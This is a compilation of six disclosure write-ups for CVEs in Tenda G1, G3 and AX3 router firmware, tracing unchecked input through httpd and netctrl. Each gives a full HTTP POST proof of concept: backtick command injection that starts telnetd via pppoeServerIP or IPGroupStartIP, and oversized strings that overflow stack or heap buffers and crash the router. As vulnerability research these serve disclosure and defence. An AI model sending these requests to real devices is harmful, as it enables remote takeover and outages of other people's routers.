Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetPppoeServer. This vulnerability allows attackers to execute arbitrary commands via the pppoeServerIP, pppoeServerStartIP, and pppoeServerEndIP parameters.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `httpd` binary:

In `formSetPppoeServer` function, An attacker can upload pictures to the router, `pppoeServerIP、pppoeServerStartIP、pppoeServerEndIP` is directly passed by the attacker, so we can control the `pppoeServerIP、pppoeServerStartIP、pppoeServerEndIP` to attack the OS.

First, make corresponding settings according to the selected network mode. This vulnerability occurs in the `setPppoeServer` function. We mainly explain the data flow of this part.

Here, enter the function `getNewPppoeServer` for the next data flow tracking.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_35/images/1.png)

The part that gets the user input is in the function `getNewPppoeServer`.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_35/images/2.png)

As you can see here, in `setPppoeServer` function, the input has not been checked. And then, call the function `SetValue` to store this input.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_35/images/3.png)

This step is mainly for inter-process communication, the vulnerability will be triggered in another binary file.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_35/images/4.png)

In `netctrl` binary:

In `pppoe_server_cfg_load` function, the initial input will be extracted.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_35/images/5.png)

In `pppoe_server_server_info_parse` function

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_35/images/6.png)

Eventually, in `pppoe_server_start` function, the initial input will cause command injection.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_35/images/7.png)

**Supplement**

The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.

**PoC**

We set `pppoeServerIP` as **`telnetd`** , and the router will excute it,such as:

POST /goform/setPPPoEServerBasicInfo HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 183
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/pppoeAuth/pppoeBasicSetting.html?0.9511555033319595
Cookie: \_:USERNAME:\_=; G3v3\_user=

pppoeServerEn=true&pppoeServerIP=\`telnetd\`&pppoeServerStartIP=172.20.20.2&pppoeServerEndIP=172.20.20.129&pppoeServerDns1=192.168.1.252&pppoeServerDns2=223.5.5.5&pppoeServeNotifyTime=7

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_35/images/8.png)

**Result**

The target router has enabled the telnet service.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_35/images/9.png)

CVE-2022-24171: my_vuln/35.md at main · pjqwudi/my_vuln

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetIpGroup. This vulnerability allows attackers to execute arbitrary commands via the IPGroupStartIP and IPGroupEndIP parameters.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `httpd` binary:

In `formSetIpGroup` function, `IPGroupStartIP、IPGroupEndIP` is directly passed by the attacker, so we can control the `IPGroupStartIP、IPGroupEndIP` to attack the OS.

First, make corresponding settings according to the selected network mode. This vulnerability occurs in the `formSetWanRouteRule` function. We mainly explain the data flow of this part.

Here, enter the function `getNewWanRouteRule` for the next data flow tracking.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_37/images/1.png)

The part that gets the user input is in the function `getIpSecTunnelSettings`.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_37/images/2.png)

**Here, the user input is extracted through the `get_item_in_list` function.(`bhv.ipgroup.list`) We can fully control this input. We will describe this part in detail later. Let us continue to explore the process triggered by the vulnerability.**

As you can see here, in `addWanRouteRule` function, the input has not been checked. And then, call the function `SetValue` to store this input.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_37/images/3.png)

This step is mainly for inter-process communication, the vulnerability will be triggered in another binary file.**It should be noted that here you need to ensure that the value of `wans.policy.type` is 0**.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_37/images/4.png)

In `netctrl` binary:

In `route_set_user_policy_rule` function, the initial input will be extracted and cause command injection.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_37/images/5.png)

**Now let's sort out the above two questions:**

*   **Need to be able to control the value of `bhv.ipgroup.list` (from user input)**
*   **Need to make the value of `wans.policy.type` 0**

**for Q1：**

In `formSetIpGroup` function, `IPGroupStartIP、IPGroupEndIP` is directly passed by the attacker, so we can control the value of `IPGroupStartIP、IPGroupEndIP`.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_37/images/6.png)

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_37/images/7.png)

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_37/images/8.png)

So far we understand that the user input is extracted in the function `getNewIpGroup` and stored in the router configuration in the function **`addIpGroup`**.

**for Q2：**

In `formSetWanRoutePolicy` function, `wanRoutePolicyType` is directly passed by the attacker, so we can control the value of `wanRoutePolicyType`.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_37/images/9.png)

We want to make the value of `wans.policy.type` 0, just need `wanRoutePolicyType` to be custom.

**Supplement**

The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.

Vulnerability trigger steps:

*   set `wanRoutePolicyType` \=custom, in (`wanRoutePolicyType`)
*   set `IPGroupStartIP`\=`telnetd`, in (`formSetIpGroup`)
*   set wan route rule, in (`formSetWanRouteRule`)

**PoC**

set `wanRoutePolicyType` \=custom, in (`wanRoutePolicyType`)

POST /goform/setWanRoutePolicy HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/behavior/multiWan.html?0.9165846025889601
Cookie: \_:USERNAME:\_=; G3v3\_user=

wanRoutePolicyType=custom&selectAll=false&wanDetectEn=false

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_37/images/10.png)

set `IPGroupStartIP`\=`telnetd`, in (`formSetIpGroup`)

POST /goform/setIPGroup HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/behavior/ipTimeGroup.html?0.628992489383655
Cookie: \_:USERNAME:\_=; G3v3\_user=

IPGroupIndex=0&IPGroupName=pjqwudi&IPGroupStartIP=\`telnetd\`&IPGroupEndIP=192.168.1.5

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_37/images/11.png)

set wan route rule, in (`formSetWanRouteRule`)

POST /goform/setIPGroup HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/behavior/ipTimeGroup.html?0.628992489383655
Cookie: \_:USERNAME:\_=; G3v3\_user=

IPGroupIndex=0&IPGroupName=pjqwudi&IPGroupStartIP=\`telnetd\`&IPGroupEndIP=192.168.1.5

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_37/images/12.png)

**Result**

The target router has enabled the telnet service.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_37/images/13.png)

CVE-2022-24168: my_vuln/37.md at main · pjqwudi/my_vuln

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a stack overflow in the function formIPMacBindAdd. This vulnerability allows attackers to cause a Denial of Service (DoS) via the IPMacBindRule parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `formIPMacBindAdd` function, `IPMacBindRule` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the `IPMacBindRule` to execute arbitrary code.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_41/images/1.png)

As you can see here, the input has not been checked. In `ipMacBindListStore` function, the parameter `IPMacBindRule` is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_41/images/2.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `IPMacBindRule` as **aaaaaaaaa......** , and the router will crash, such as:

POST /goform/addIpMacBind HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 3314
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/security/ipMac.html?0.591809966604824
Cookie: \_:USERNAME:\_=; G3v3\_user=

IPMacBindRule=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_41/images/3.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2022-24169: my_vuln/41.md at main · pjqwudi/my_vuln

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function formSetVirtualSer. This vulnerability allows attackers to cause a Denial of Service (DoS) via the list parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:AX3

Version:V16.03.12.10\_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `formSetVirtualSer` function, `list` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the `list` to execute arbitrary code.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_29/images/1.png)

As you can see here, the input has not been checked. In `save_virtualser_data` function, the parameter `list` is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_29/images/2.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `list` as **aaaaaaaaaa......,7777,7778,1~192.168.1.51,7779,7780,1** , and the router will crash, such as:

POST /goform/SetVirtualServerCfg HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 542
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/virtual\_server.html?random=0.28528882588709836&
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0umycvb

list=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,7777,7778,1~192.168.1.51,7779,7780,1

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_29/images/3.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2022-24156: my_vuln/29.md at main · pjqwudi/my_vuln

Tenda AX3 v16.03.12.10_CN was discovered to contain a heap overflow in the function setSchedWifi. This vulnerability allows attackers to cause a Denial of Service (DoS) via the schedStartTime and schedEndTime parameters.

**Tenda Vulnerability**

Vendor:Tenda

Product:AX3

Version:V16.03.12.10\_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Heap Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an heap overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Heap Overflow**

In `httpd` binary:

In `setSchedWifi` function, `schedStartTime、schedEndTime` is directly passed by the attacker, If this part of the data is too long, it will cause the heap overflow, so we can control the `schedStartTime、schedEndTime` to crash the program.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_25/images/1.png)

As you can see here, the input has not been checked. In `setSchedWifi` function, the parameter `schedStartTime、schedEndTime` is directly copy to a local variable placed on the heap, which overflow the heap and crash the program.

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `schedEndTime` as **aaaaaaaaaaaaaaaaaaa.......** , and the router will crash, such as:

POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 175
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/wifi\_time.html?random=0.42441434754681306&
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0johcvb

schedWifiEnable=1&schedStartTime=00%3A00&schedEndTime=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&timeType=1&day=1%2C1%2C1%2C1%2C1%2C0%2C0

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_25/images/2.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2022-24155: my_vuln/25.md at main · pjqwudi/my_vuln

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a stack overflow in the function formSetVirtualSer. This vulnerability allows attackers to cause a Denial of Service (DoS) via the DnsHijackRule parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `formSetVirtualSer` function, `DnsHijackRule` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the `DnsHijackRule` to execute arbitrary code.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_40/images/1.png)

As you can see here, the input has not been checked. In `dns_hijack_rule_store` function, the parameter `DnsHijackRule` is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_40/images/2.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `DnsHijackRule` as **aaaaaaaaa......** , and the router will crash, such as:

POST /goform/addDNSHijack HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 2014
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/network/dnsHijack.html?0.40441598835089243
Cookie: \_:USERNAME:\_=; G3v3\_user=

DnsHijackRule=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_40/images/3.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

